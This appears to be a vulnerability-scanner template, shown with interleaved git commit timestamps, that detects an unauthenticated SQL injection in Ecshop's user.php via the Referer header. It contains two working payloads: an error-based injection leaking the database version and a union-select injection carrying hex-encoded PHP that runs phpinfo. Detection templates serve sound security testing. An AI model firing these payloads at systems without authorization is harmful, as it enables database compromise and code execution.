2021-11-08 08:12:13 +00:00
id : ecshop-sqli
2021-11-07 02:03:09 +00:00
info :
2021-11-08 08:12:13 +00:00
name : Ecshop SQLi
2022-05-18 09:20:12 +00:00
author : Lark-lab,ImNightmaree,ritikchaddha
2021-11-08 08:12:13 +00:00
severity : high
2021-11-23 10:09:00 +00:00
description : A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field.
2021-11-08 08:12:13 +00:00
reference :
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
2022-05-18 09:20:12 +00:00
- http://www.wins21.com/mobile/blog/blog_view.html?num=1172
2021-11-08 10:15:54 +00:00
tags : sqli,php,ecshop
2021-11-07 02:03:09 +00:00
2021-11-07 02:30:38 +00:00
requests :
2021-11-07 02:03:09 +00:00
- raw :
2021-11-07 02:36:28 +00:00
- |
2021-11-08 08:12:13 +00:00
GET /user.php?act=login HTTP/1.1
2021-11-07 02:03:09 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Referer : 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
2022-05-18 09:23:08 +00:00
2022-05-18 09:20:12 +00:00
- |
GET /user.php?act=login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Referer : 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"'/*";}554fcae493e564ee0dc75bdf2ebf94ca
2021-11-07 02:03:09 +00:00
2022-05-18 09:20:12 +00:00
matchers-condition : or
2021-11-07 02:03:09 +00:00
matchers :
- type : word
words :
2021-11-08 08:12:44 +00:00
- 'XPATH syntax error:'
2021-11-08 08:12:13 +00:00
- '[error] =>'
- '[0] => Array'
- 'MySQL server error report:Array'
2021-11-07 02:39:21 +00:00
condition : and
2022-05-18 09:20:12 +00:00
- type : word
words :
- "PHP Extension"
- "PHP Version"
condition : and
